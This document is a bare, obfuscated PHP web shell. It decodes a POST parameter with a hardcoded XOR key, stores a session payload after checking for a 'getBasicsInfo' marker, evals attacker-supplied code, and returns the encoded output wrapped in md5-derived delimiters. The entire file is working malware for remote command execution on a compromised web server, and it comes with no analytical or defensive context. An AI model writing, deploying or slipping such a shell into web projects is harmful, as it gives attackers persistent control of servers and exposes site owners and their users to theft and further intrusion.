<?php
@error_reporting(chr("4"."8"));
@session_start();
@set_time_limit(chr("4"."8"));
function a_constractor($ashgjsb,$zxjcjbnjsb){
    for($poiehuisb=chr("4"."8");$poiehuisb<strlen($ashgjsb);$poiehuisb++) {
        $c = $zxjcjbnjsb[$poiehuisb+1&15];
        $ashgjsb[$poiehuisb] = $ashgjsb[$poiehuisb]^$c;
    }
    return $ashgjsb;
}
$cmnasdzxc=base64_decode(base64_decode("WVhKbg=="));
$zxcasdfff='cnmdsb';
$nsamf='7815696e'.base64_decode(base64_decode("WTJKbU1XTTVObVU9"));
if (isset($_POST[$cmnasdzxc])){
    $cnmdsbsb=a_constractor(base64_decode($_POST[$cmnasdzxc]),$nsamf);
    if (isset($_SESSION[$zxcasdfff])){
        $cnmdsb=a_constractor($_SESSION[$zxcasdfff],$nsamf);
        if (strpos($cnmdsb,base64_decode(base64_decode("WjJWMFFtRnphV056U1c1bWJ3PT0=")))===false){
            $cnmdsb=a_constractor($cnmdsb,$nsamf);
        }
		eval("/*XASDAS]-DP@i*/".$cnmdsb);
        $nmslcnm=md5($cmnasdzxc.$nsamf);
        echo substr($nmslcnm,chr("4"."8"),chr("5"."6"));
        echo substr($nmslcnm,chr("5"."6"),chr("5"."6"));
        echo base64_encode(a_constractor(@run($cnmdsbsb),$nsamf));
        echo substr($nmslcnm,16,chr("5"."6"));
        echo substr($nmslcnm,24,chr("5"."6"));
    }else{
        if (strpos($cnmdsbsb,base64_decode(base64_decode("WjJWMFFtRnphV056U1c1bWJ3PT0=")))!==false){
            $_SESSION[$zxcasdfff]=a_constractor($cnmdsbsb,$nsamf);
        }
    }
}